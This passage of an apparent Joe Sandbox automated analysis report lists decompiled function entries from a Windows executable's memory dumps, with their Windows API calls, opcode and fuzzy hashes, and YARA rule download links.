                                                                                    • Opcode ID: e7fe5703d7bd3fcf55848a10b898419f89e1f05d712649635250529f0732eae7
                                                                                    • Instruction ID: 46da233810ab8705a60d5fecea6873e3ec19e2d048561a60667d3adf8aeb695a
                                                                                    • Opcode Fuzzy Hash: e7fe5703d7bd3fcf55848a10b898419f89e1f05d712649635250529f0732eae7
                                                                                    • Instruction Fuzzy Hash: 95014472B08B85C2E7119B12B460BBAA7A1F7847D8F988035EA4947A95DF3DD50A8B10
                                                                                    Function 00007FF767F0E5FC Relevance: 4.7, APIs: 3, Instructions: 167COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 1791019856-0
                                                                                    • Opcode ID: 8380d45a326b3d1e8aced02d63fd4f4030e7a97d598a3e3abbdea63c338b2f08
                                                                                    • Instruction ID: 711f8b2df8a10f1729a6a6febb9bf6faf93ca5741ed93f3ef99bb373fae4616f
                                                                                    • Opcode Fuzzy Hash: 8380d45a326b3d1e8aced02d63fd4f4030e7a97d598a3e3abbdea63c338b2f08
                                                                                    • Instruction Fuzzy Hash: A7619B72A08542C6EB74BE10D574AB9B3A1FB84786F848135DBAE83790DF3CE4538720
                                                                                    Function 00007FF767F06718 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: GetLocaleInfoEx
                                                                                    • API String ID: 2299586839-2904428671
                                                                                    • Opcode ID: a658af243d55a89f5ef705efa73716f0020930f295102f0f64cb9cdd66453038
                                                                                    • Instruction ID: adea657276674cc53fb701dbd8a6f9859791bc6165ad0f7afc98ffe13646332a
                                                                                    • Opcode Fuzzy Hash: a658af243d55a89f5ef705efa73716f0020930f295102f0f64cb9cdd66453038
                                                                                    • Instruction Fuzzy Hash: 7B01A234B08B81C5EB01AB56B4208EAE360AF85FD0F988035EE5D13B65DE3CD5838750
                                                                                    Function 00007FF767F09C78 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                    • String ID:
                                                                                    • API String ID: 15204871-0
                                                                                    • Opcode ID: 3399ca020fd9c3d0a4c647ae8a4c7378a3b1d81ee0c34c820329e66b1fe6482f
                                                                                    • Instruction ID: ac21a435fdc1cb9c858aa5d4f1cda4615799d944226a0e9d0553054699af879a
                                                                                    • Opcode Fuzzy Hash: 3399ca020fd9c3d0a4c647ae8a4c7378a3b1d81ee0c34c820329e66b1fe6482f
                                                                                    • Instruction Fuzzy Hash: 70B18D73604B85CBEB15DF29C4663A87BA0F744B89F548821DB6D837A4DF39D452C710
                                                                                    Function 00007FF767EFF824 Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-0
                                                                                    • Opcode ID: d8934e6e1ba48405ade09f6055151bcf19456359ef227bb3d6864e44d95dc430
                                                                                    • Instruction ID: 288160cae8f4936cf935f41fe74408e43d8ff77cc5427ac7a306b6187f5fdf32
                                                                                    • Opcode Fuzzy Hash: d8934e6e1ba48405ade09f6055151bcf19456359ef227bb3d6864e44d95dc430
                                                                                    • Instruction Fuzzy Hash: 0E127E32A08BC1C6E751DF3894246FDB7A4FB59788F859235EA8C42652EF3DE186C710
                                                                                    Function 00007FF767F0C698 Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 180204a92438682753827171fbb3bcfcd27f48bd49a6ffb45e8bee0a6e23b65e
                                                                                    • Instruction ID: 5ed67c445535e1aa769e494259c180e024d38234ff470e8f8a2dade6e9ec49b3
                                                                                    • Opcode Fuzzy Hash: 180204a92438682753827171fbb3bcfcd27f48bd49a6ffb45e8bee0a6e23b65e
                                                                                    • Instruction Fuzzy Hash: E7E13132A04B8186E720DB61E4616EE77A4F7947C9F804635DF8D53B56EF78E246C310
                                                                                    Function 00007FF767F0AAE0 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 92bed89c0e7bfadffcad49ca7db2a4ab3573026032025ba519bc2425fdab50f0
                                                                                    • Instruction ID: da031006cb97caa51f7405b2370c1a5bdf45909a87572bfea173dfbd6bd5669b
                                                                                    • Opcode Fuzzy Hash: 92bed89c0e7bfadffcad49ca7db2a4ab3573026032025ba519bc2425fdab50f0
                                                                                    • Instruction Fuzzy Hash: 3051C322B08681C5EB20AB72A8609EABBE1FB447D5F944134EE5D27B95DE3CD443C710
                                                                                    Function 00007FF767F0E844 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 673564084-0
                                                                                    • Opcode ID: 33dce63c000d8f8ecba602ed5e9c9b01eb30c559286b4661bb96ac18289c62d7
                                                                                    • Instruction ID: dbfca3cd7b156a4de807f5487925f1476e0303653405563b8ea95f2602f1c914
                                                                                    • Opcode Fuzzy Hash: 33dce63c000d8f8ecba602ed5e9c9b01eb30c559286b4661bb96ac18289c62d7
                                                                                    • Instruction Fuzzy Hash: 3E31A131A08282C6EB64AB21D461BFAB391FB847C6F848035DA9D83785DE3CE517C710
                                                                                    Function 00007FF767F0E494 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF767F0492C: GetLastError.KERNEL32 ref: 00007FF767F0493B
                                                                                      • Part of subcall function 00007FF767F0492C: FlsGetValue.KERNEL32 ref: 00007FF767F04950
                                                                                      • Part of subcall function 00007FF767F0492C: SetLastError.KERNEL32 ref: 00007FF767F049DB
                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF767F0EC83,?,00000000,00000092,?,?,00000000,?,00007FF767F02915), ref: 00007FF767F0E532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                    • String ID:
                                                                                    • API String ID: 3029459697-0
                                                                                    • Opcode ID: 299e2fb3c39f1723234e1e9a30f7c01ce5d09dac68b119f8fefbba8bba3a8293
                                                                                    • Instruction ID: c80478d0fd0d8e5854ab65d0c90c6aa7ff3d4623fc007937e66a551f5361bc13
                                                                                    • Opcode Fuzzy Hash: 299e2fb3c39f1723234e1e9a30f7c01ce5d09dac68b119f8fefbba8bba3a8293
                                                                                    • Instruction Fuzzy Hash: 9511D26BA08645CAEB15AF25D060AF8B7A0FB90BE2F848135C669433C4EE38D5D3C750
                                                                                    Function 00007FF767F0EA4C Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF767F0492C: GetLastError.KERNEL32 ref: 00007FF767F0493B
                                                                                      • Part of subcall function 00007FF767F0492C: FlsGetValue.KERNEL32 ref: 00007FF767F04950
                                                                                      • Part of subcall function 00007FF767F0492C: SetLastError.KERNEL32 ref: 00007FF767F049DB
                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00007FF767F0E7F6), ref: 00007FF767F0EA83
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocaleValue
                                                                                    • String ID:
                                                                                    • API String ID: 3796814847-0
                                                                                    • Opcode ID: 27a870d04b5633b0ce9003d67710837246028b62cd08f72254b1953ba3c47300
                                                                                    • Instruction ID: 69be951cc55f10fc4197032716e30bccbe96df37a1aaebf7c1b59e32ee26d3bf
                                                                                    • Opcode Fuzzy Hash: 27a870d04b5633b0ce9003d67710837246028b62cd08f72254b1953ba3c47300
                                                                                    • Instruction Fuzzy Hash: 26115B31B08152C3E734B621A070EBAA352FB58795F944231E66D437C4EE29D8A38710
                                                                                    Function 00007FF767F0E564 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF767F0492C: GetLastError.KERNEL32 ref: 00007FF767F0493B
                                                                                      • Part of subcall function 00007FF767F0492C: FlsGetValue.KERNEL32 ref: 00007FF767F04950
                                                                                      • Part of subcall function 00007FF767F0492C: SetLastError.KERNEL32 ref: 00007FF767F049DB
                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF767F0EC3F,?,00000000,00000092,?,?,00000000,?,00007FF767F02915), ref: 00007FF767F0E5E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                    • String ID:
                                                                                    • API String ID: 3029459697-0
                                                                                    • Opcode ID: 388ee0737461765ef09b34f64180d27f0f64b5a2ec9b35637385c1be6d2a8eb3
                                                                                    • Instruction ID: 06be6cfa84a15dd419ef5d78fee8ffae8d4fe1187f2818be277a917313f408eb
                                                                                    • Opcode Fuzzy Hash: 388ee0737461765ef09b34f64180d27f0f64b5a2ec9b35637385c1be6d2a8eb3
                                                                                    • Instruction Fuzzy Hash: 0D019262B08281CAE7147B25E570BF9B7D2EB507E6F858231D668873C4EF689487C710
                                                                                    Function 00007FF767F06384 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF767F066E7,?,?,?,?,?,?,?,?,00000000,00007FF767F0DAE4), ref: 00007FF767F063D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2099609381-0
                                                                                    • Opcode ID: 6624756bf7cade8dc1123afc4cca3197e7e1b61b4bdd0de2c75fdcf2745a3b96
                                                                                    • Instruction ID: 65a4b21cd38522666ef906a09c265e53a570b621e26f5a203eef5a583d40632d
                                                                                    • Opcode Fuzzy Hash: 6624756bf7cade8dc1123afc4cca3197e7e1b61b4bdd0de2c75fdcf2745a3b96
                                                                                    • Instruction Fuzzy Hash: 45F08172704B41C2E700EB55F8A09E5A361FB997C0F948035EA1D83764DE3CD463C700
                                                                                    Function 00007FF767F08340 Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32 ref: 00007FF767F083E5
                                                                                      • Part of subcall function 00007FF767F062D4: HeapAlloc.KERNEL32(?,?,00000000,00007FF767F04B06,?,?,000068C3FE2C4CD1,00007FF767F006B1,?,?,?,?,00007FF767F0A0B6,?,?,00000000), ref: 00007FF767F06329
                                                                                      • Part of subcall function 00007FF767F05CE8: HeapFree.KERNEL32(?,?,00007FF767F0194B,00007FF767F0CF26,?,?,?,00007FF767F0D2A3,?,?,00000000,00007FF767F0D7E1,?,?,?,00007FF767F0D713), ref: 00007FF767F05CFE
                                                                                      • Part of subcall function 00007FF767F05CE8: GetLastError.KERNEL32(?,?,00007FF767F0194B,00007FF767F0CF26,?,?,?,00007FF767F0D2A3,?,?,00000000,00007FF767F0D7E1,?,?,?,00007FF767F0D713), ref: 00007FF767F05D08
                                                                                      • Part of subcall function 00007FF767F0F210: _invalid_parameter_noinfo.LIBCMT ref: 00007FF767F0F243
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 916656526-0
                                                                                    • Opcode ID: de99da81833a26c24871d60779b1f3f52ea88d3cae1a250500faf86da5a9329f
                                                                                    • Instruction ID: 7d357883ca9e482164173928c60d8741f760d1f55a7c6365febfde3525960309
                                                                                    • Opcode Fuzzy Hash: de99da81833a26c24871d60779b1f3f52ea88d3cae1a250500faf86da5a9329f
                                                                                    • Instruction Fuzzy Hash: 9C418121B0D24285EA70BA26A831EFAE7817F857C1FD45535EE4D47B85EE3CE4038620
                                                                                    Function 00007FF767F0BDD4 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapProcess
                                                                                    • String ID:
                                                                                    • API String ID: 54951025-0
                                                                                    • Opcode ID: 1da0440ed416fdd449553909bf9a1db47b46f554b6c3f078e270c30caa019559
                                                                                    • Instruction ID: efb6f04ed1b047a9f66c07d3c06fa6bc76dd957fb86a384e5459785bbdb9bc28
                                                                                    • Opcode Fuzzy Hash: 1da0440ed416fdd449553909bf9a1db47b46f554b6c3f078e270c30caa019559
                                                                                    • Instruction Fuzzy Hash: 0EB09220E07A42C2EA097B516C9266463A47F88B84FD48079C40C41320DF2C20B74721
                                                                                    Function 00007FF767F02764 Relevance: .3, Instructions: 309COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 4023145424-0
                                                                                    • Opcode ID: 2193573eb62e0e349bac0217901461b891f751db6f69d9bcdbd2da4b2e5dc450
                                                                                    • Instruction ID: bee40784caa7db4478f7c37113a3f73b91123d07cfdb68c73524749cb96fdd5e
                                                                                    • Opcode Fuzzy Hash: 2193573eb62e0e349bac0217901461b891f751db6f69d9bcdbd2da4b2e5dc450
                                                                                    • Instruction Fuzzy Hash: 94C1B266A08682C5EB60EB659830BFAA7A0FB947C9FC04036DE4D87785DE3DD547C720
                                                                                    Function 00007FF767F0DBA8 Relevance: .3, Instructions: 271COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Value_invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 1500699246-0
                                                                                    • Opcode ID: 83ca80d9d4f9584a6a4f4fc1a54bd5d488d3e5bf467065ee0d380736a2b3f2d8
                                                                                    • Instruction ID: f7be7949af5a767e76be6b00890e73cd4b1983ce55555242b711634d08a396c1
                                                                                    • Opcode Fuzzy Hash: 83ca80d9d4f9584a6a4f4fc1a54bd5d488d3e5bf467065ee0d380736a2b3f2d8
                                                                                    • Instruction Fuzzy Hash: 46B1A432A18646C2EB64AF21D431AF9B391EB50BCAFA04131DA59837C9DF7CD547C760
                                                                                    Function 00007FF767F0000C Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: ba5bf7547bafeab8d52466a5aa7f3da58d874c3429c50010ead4ade79a679553
                                                                                    • Instruction ID: cbc5db2de6946a20f224c0fb6b8ae3c0f17104a591252fb09f5e12f4d6798597
                                                                                    • Opcode Fuzzy Hash: ba5bf7547bafeab8d52466a5aa7f3da58d874c3429c50010ead4ade79a679553
                                                                                    • Instruction Fuzzy Hash: D181A172A14A51C6EB20EE25C4B1BBDA360FB44BE9F948636EE1D97794DF78D0438310
                                                                                    Function 00007FF767F0F84C Relevance: .2, Instructions: 183COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.4153460255.00007FF767EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153576158.00007FF767F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153634296.00007FF767F26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.4153660576.00007FF767F29000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff767ef0000_12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    • Opcode ID: 80c9ba1454821e56d09626715f1adff33740e042ef6f704d56f420b68e0c08fa
                                                                                    • Instruction ID: ed941a943e8e409ecbef998a49fc0b6eef54eec7f60e7f863e202119cad283cf
                                                                                    • Opcode Fuzzy Hash: 80c9ba1454821e56d09626715f1adff33740e042ef6f704d56f420b68e0c08fa
                                                                                    • Instruction Fuzzy Hash: C761E722E1C643C6F7A4A9289870AF9E7C1AF407F1F940635DA5D827D1DE6DE8038B24
                                                                                    Function 00007FF767F01894 Relevance: .1, Instructions: 126COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4153525404.00007FF767EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF767EF0000, based on PE: true
